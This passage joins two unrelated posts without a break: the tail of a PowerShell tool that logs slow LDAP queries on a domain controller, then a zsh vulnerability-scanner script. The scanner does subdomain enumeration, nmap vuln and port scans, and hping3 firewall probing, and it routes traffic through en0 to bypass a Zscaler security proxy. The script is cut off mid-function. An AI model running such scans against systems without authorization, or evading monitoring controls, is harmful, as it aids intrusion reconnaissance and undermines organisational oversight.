                "ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
                "TimeInServer" { $eventData.TimeInServer = $node.'#text' }
            }
        }
    }
    catch {
        Write-Log "Error parsing event XML: $_" "WARNING"
    }

    return $eventData
}

Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"

# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
    $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
    $currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
    
    if ($currentValue.'15 Field Engineering' -lt 5) {
        Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
        Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
        Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
    }
    else {
        Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
    }
}
catch {
    Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}

# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader

Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"

$startTime = Get-Date
$lastCheck = $startTime   # timestamp of the last event-log poll (avoids duplicate logging)
$queriesLogged = 0

try {
    while ($true) {
        # Check if monitoring duration exceeded
        if ($MonitorDuration -gt 0) {
            $elapsed = (Get-Date) - $startTime
            if ($elapsed.TotalMinutes -ge $MonitorDuration) {
                Write-Log "Monitoring duration reached. Stopping." "INFO"
                break
            }
        }

        # Get current LDAP statistics
        $stats = Get-LDAPStatistics
        if ($stats) {
            Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
        }

        # Query Directory Service event log for expensive LDAP queries
        # Event ID 1644 = expensive search operations
        # Fetch only events newer than the last poll so nothing is logged twice
        $events = Get-WinEvent -FilterHashtable @{
            LogName = 'Directory Service'
            Id = 1644
            StartTime = $lastCheck
        } -ErrorAction SilentlyContinue
        $lastCheck = Get-Date

        foreach ($event in $events) {
            $eventData = Parse-LDAPEvent -Event $event
            
            # Convert time in server from milliseconds to seconds
            $timeInSeconds = if ($eventData.TimeInServer) { 
                [int]$eventData.TimeInServer / 1000 
            } else { 
                0 
            }

            if ($timeInSeconds -ge $ThresholdSeconds) {
                $queriesLogged++
                
                Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
                Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
                Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
                Write-Log "Duration: $timeInSeconds seconds" "WARNING"
                Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
                Write-Log "Filter: $($eventData.Filter)" "WARNING"
                Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
                Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
                Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
                Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
                Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
                Write-Log "======================================" "WARNING"

                # Write to CSV
                $csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
                Add-Content -Path $csvFile -Value $csvLine
            }
        }

        Start-Sleep -Seconds 5
    }
}
catch {
    Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
    Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
    Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
    Write-Log "Log file: $logFile" "INFO"
    Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples

### Basic Usage (Continuous Monitoring)

Run with default settings - monitors queries taking 5+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1
```

### Custom Threshold and Duration

Monitor for 30 minutes, logging queries that take 3+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```

### Custom Log Location

Save logs to a specific directory:

```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```

### Verbose Output

See real-time LDAP statistics while monitoring:

```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```

## Requirements

- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**

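A quick way to confirm these prerequisites before starting (a sketch; run it in the elevated PowerShell session you intend to use):

```powershell
# PowerShell version (needs 5.1 or later)
$PSVersionTable.PSVersion

# AD DS role installed? (ServerManager module ships with Windows Server)
(Get-WindowsFeature AD-Domain-Services).Installed

# Is the current session elevated?
([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
```
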
## Understanding the Output

### Log File Example

```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```

### What to Look For

- **High visited/returned ratio** - Indicates an inefficient filter (see the example after this list)
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly

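As a concrete, hypothetical illustration using the filter from the log example above: `(&(objectClass=user)(memberOf=*))` forces the DC to visit every user object, because a wildcard presence test on `memberOf` cannot be answered from an index. Asking the question the other way around is far cheaper:

```powershell
# Expensive: presence test on memberOf visits every user object
Get-ADUser -LDAPFilter "(&(objectClass=user)(memberOf=*))"

# Cheaper: an equality match on a specific group DN (hypothetical group shown)
# is resolved through the membership links rather than a full scan
Get-ADUser -LDAPFilter "(memberOf=CN=Sales,OU=Groups,DC=contoso,DC=com)"

# Or enumerate the group's members directly
Get-ADGroupMember -Identity "Sales"
```
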
## Troubleshooting Common Issues

### No Events Appearing

If you're not seeing Event ID 1644, the logging thresholds may be set too high. With Field Engineering logging at level 5 (which the script enables), the thresholds are controlled by registry values under `NTDS\Parameters`:

```powershell
# Log searches whose server execution time exceeds 1000ms (1 second)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    -Name "Search Time Threshold (msecs)" -Value 1000 -Type DWord
```

### Script Requires Restart

After enabling Field Engineering logging, you may need to restart the NTDS service:

```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns (or with the PowerShell snippet below)
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

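For step 3, a quick PowerShell alternative to Excel for spotting repeat offenders (the CSV file name below is an example; use whichever file your run produced):

```powershell
# Top 10 client/filter combinations by number of expensive queries
Import-Csv .\LDAP_Queries_20250115_142345.csv |
    Group-Object ClientIP, Filter |
    Sort-Object Count -Descending |
    Select-Object Count, Name -First 10
```
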
Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes (see the sketch below)
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate

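Indexing an attribute means setting bit 1 of `searchFlags` on its `attributeSchema` object. A minimal sketch, assuming a hypothetical custom attribute and domain (schema changes require Schema Admins rights and should be tested in a lab first):

```powershell
# Hypothetical: index "my-Custom-Attr" by OR-ing bit 1 (index over attribute) into searchFlags
$schemaDN = "CN=my-Custom-Attr,CN=Schema,CN=Configuration,DC=yourdomain,DC=com"
$attr = Get-ADObject $schemaDN -Properties searchFlags
Set-ADObject $schemaDN -Replace @{ searchFlags = ($attr.searchFlags -bor 1) }
```
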
This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!


Macbook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive, low-impact penetration-testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

| Scan Type | Duration |
| --- | --- |
| Basic | 2-5 min |
| With subdomains | +1-2 min per subdomain |
| With vulnerabilities | +10-20 min |
| Full scan | 15-30 min |

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs reconnaissance and non-destructive scanning only:

  • ✅ DNS queries, certificate logs, public web requests, port and service scans
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

# OUTER_EOF keeps this heredoc from terminating early at the EOF delimiters used inside the script
cat > ./security_scanner_enhanced.sh << 'OUTER_EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    cat << EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    > "$EXEC_REPORT"
    > "$TECH_REPORT"
    > "$VULN_REPORT"
    > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    # grep -c prints 0 itself when there is no match, so no "|| echo 0" fallback
    # (that fallback would yield "0\n0" and break the numeric tests below)
    TLS_12=$(grep -c "TLSv1\.2" ssl_ciphers.txt)
    TLS_13=$(grep -c "TLSv1\.3" ssl_ciphers.txt)
    TLS_10=$(grep -c "TLSv1\.0" ssl_ciphers.txt)
    TLS_11=$(grep -c "TLSv1\.1" ssl_ciphers.txt)
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt)  # grep -c prints 0 when no matches
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt)  # grep -c prints 0 when no matches
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
